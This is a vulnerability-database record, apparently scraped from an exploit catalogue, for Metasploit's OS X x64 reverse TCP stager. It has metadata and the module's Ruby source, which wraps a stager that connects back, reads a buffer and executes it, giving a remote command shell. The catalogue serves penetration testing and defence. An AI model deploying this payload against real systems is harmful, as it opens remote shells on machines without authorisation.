Description
dup2 socket in edi, then execve. Connect, read length, read buffer, execute
{"id": "MSF:PAYLOAD-OSX-X64-DUPANDEXECVE-REVERSE_TCP-", "vendorId": null, "type": "metasploit", "bulletinFamily": "exploit", "title": "OS X dup2 Command Shell, Reverse TCP Stager", "description": "dup2 socket in edi, then execve. Connect, read length, read buffer, execute\n", "published": "2012-09-22T13:31:42", "modified": "2022-05-06T13:36:55", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.rapid7.com/db/modules/payload/osx/x64/dupandexecve/reverse_tcp/", "reporter": "nemo, nemo <nemo@felinemenace.org>", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-08-18T06:08:16", "viewCount": 9, "enchantments": {"score": {"value": 0.2, "vector": "NONE"}, "vulnersScore": 0.2}, "_state": {"score": 1684014595, "dependencies": 1660803555, "epss": 1679299833}, "_internal": {"score_hash": "004d91c8292f9b182fbfd726210942af"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/stagers/osx/x64/reverse_tcp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nmodule MetasploitModule\n\n CachedSize = 168\n\n include Msf::Payload::Osx::ReverseTcp_x64\n include Msf::Payload::TransportConfig\n include Msf::Payload::Stager\n\n def initialize(info = { })\n super(merge_info(info,\n 'Name' => 'Reverse TCP Stager',\n 'Description' => 'Connect, read length, read buffer, execute',\n 'Author' => 'nemo <nemo[at]felinemenace.org>',\n 'License' => MSF_LICENSE,\n 'Platform' => 'osx',\n 'Arch' => ARCH_X64,\n 'Handler' => Msf::Handler::ReverseTcp,\n 'Stager' => { 'RequiresMidstager' => false }, # Originally set to true, but only Linux payloads use this at the moment, not OSX.\n 'Convention' => 'sockedi',\n ))\n end\n\n def generate(opts = {})\n generate_reverse_tcp(opts)\n end\n\nend\n", "metasploitReliability": "", "metasploitHistory": ""}
{}